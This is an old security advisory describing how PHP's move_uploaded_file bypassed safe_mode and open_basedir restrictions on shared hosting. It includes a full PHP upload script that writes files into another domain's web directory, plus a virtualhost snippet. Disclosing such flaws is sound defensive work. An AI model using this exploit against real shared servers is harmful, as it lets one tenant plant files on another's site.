COMMAND

	php safe mode broken via \"move_upload_file\" directive

SYSTEMS AFFECTED

	Php ??

PROBLEM

	Tozz reported :
	

	Its  possible  to  circumvent  PHP  safe_mode  restrictions   by   using
	move_uploaded_file.
	

	 Exploit :

	 =======

	

	<?

	

	$file = $HTTP_POST_FILES[\'file\'][\'name\'];

	$type = $HTTP_POST_FILES[\'file\'][\'type\'];

	$size = $HTTP_POST_FILES[\'file\'][\'size\'];

	$temp = $HTTP_POST_FILES[\'file\'][\'tmp_name\'];

	

	$size_limit = \"100000\"; // set size limit in bytes

	

	if ($file){

	if ($size < $size_limit){

	

	move_uploaded_file($temp,

	\"/domains/somebodyelse.org/public_html/www/test/\".$file);

	echo \"The file <tt>$file</tt> was sucessfully

	uploaded\";

	} else {

	echo \"Sorry, your file exceeds the size limit of $size_limit

	bytes\";

	}}

	

	echo \"

	<form enctype=\'multipart/form-data\' action=$PHP_SELF method=post>

	Upload a file: <input name=\'file\' type=\'file\'>

	<input type=\'submit\' value=\'Upload\'>

	</form>

	\";

	?>

	

	The      attacker      moved      the      uploaded       file       to:
	\"/domains/somebodyelse.org/public_html/www/test/\" while  the  user  is
	restricted with both safe_mode and open_basedir, this user  is  able  to
	upload any file where the apache user has write access.
	

	Virtualhost configuration snippet:
	

	<VirtualHost IP_HERE>

	        DocumentRoot /domains/whatever.com/public_html/root/

	        ServerName root.whatever.com

	        CustomLog /domains/whatever.com/logs/access_log combined

	        ErrorLog /domains/whatever.com/logs/error_log

	        php_admin_value safe_mode 1

	        php_admin_value open_basedir /domains/whatever.com/public_html/root/

	</VirtualHost>

	

	

SOLUTION

	Patch was comitted to CVS, release should go out anytime soon.